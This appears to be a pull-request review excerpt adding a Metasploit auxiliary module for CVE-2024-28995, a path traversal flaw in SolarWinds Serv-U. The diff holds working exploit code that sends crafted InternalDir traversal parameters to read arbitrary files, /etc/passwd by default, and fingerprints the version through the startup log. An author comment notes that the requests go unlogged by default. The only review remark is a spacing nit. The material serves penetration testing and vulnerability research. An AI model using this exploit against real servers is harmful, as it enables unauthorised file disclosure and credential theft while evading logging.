modules/auxiliary/gather/solarwinds_servu_fileread_cve_2024_28995.rb

```diff
@@ -0,0 +1,158 @@
+          'Hussein Daher' # Original finder
+        ],
+        'References' => [
+          ['CVE', '2024-28995'],
+          ['URL', 'https://www.solarwinds.com/trust-center/security-advisories/cve-2024-28995'],
+          ['URL', 'https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis']
+        ],
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          # There are no side effects I could determine. By default there is no logging enabled by Serv-U, and in
+          # testing I was not able to enable logging such that any of the exploits requests were actually logged. If
+          # a reverse proxy/gateway is in place that will likely be able to log attacker requests, but that is not a
+          # default setup.
+          'SideEffects' => [],
+          'Reliability' => []
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptBool.new('STORE_LOOT', [false, 'Store the target file as loot', true]),
+        OptString.new('TARGETURI', [true, 'The base URI path to the web application', '/']),
+        OptString.new('TARGETFILE', [true, 'The full path of a target file to read.', '/etc/passwd']),
+        OptInt.new('PATH_TRAVERSAL_COUNT', [true, 'The number of double dot (..) path segments needed to traverse to the root folder.', 4]),
+      ]
+    )
+  end
+
+  def check
+    # We try to leverage the vulnerability and read the file `Serv-U-StartupLog.txt` from the default location in
+    # a default install on both Linux and Windows. If successful, we can pull out the Serv-U version number and the
+    # OS version. By default, the location of the `Serv-U-StartupLog.txt` file is
+    # `C:\ProgramData\RhinoSoft\Serv-U\Serv-U-StartupLog.txt` on Windows, and `/usr/local/Serv-U/Serv-U-StartupLog.txt`
+    # on Linux.
+    default_paths = [
+      '\\..',
+      '/../../../../ProgramData/RhinoSoft/Serv-U'
+    ]
+
+    default_paths.each do |default_path|
+      res = send_request_cgi(
+        'method' => 'GET',
+        'uri' => normalize_uri(datastore['TARGETURI']),
+        'vars_get' => {
+          'InternalDir' => default_path,
+          'InternalFile' => 'Serv-U-StartupLog.txt'
+        }
+      )
+
+      return Msf::Exploit::CheckCode::Unknown('Connection failed') unless res
+
+      next unless res.code == 200
+
+      version = res.body.match(/Serv-U.+Version.+\(([\d+.]{1,})\)/)
+
+      next unless version
+
+      os = res.body.match(/Operating System:\s+(.+)/)
+
+      return Msf::Exploit::CheckCode::Vulnerable("SolarWinds Serv-U version #{version[1]} (#{os.nil? ? 'Unknown OS' : os[1]})")
+    end
+
+    Msf::Exploit::CheckCode::Safe
+  end
+
+  def run
+    if datastore['TARGETFILE'].start_with? '/'
+      native_path_sep = '/'
+      target_path_sep = '\\'
+      target_filepath = datastore['TARGETFILE']
+    elsif datastore['TARGETFILE'][1,3] == ':\\\\'
```

Comment:
Space missing after comma 👮‍♂️ 
```suggestion
    elsif datastore['TARGETFILE'][1, 3] == ':\\\\'
```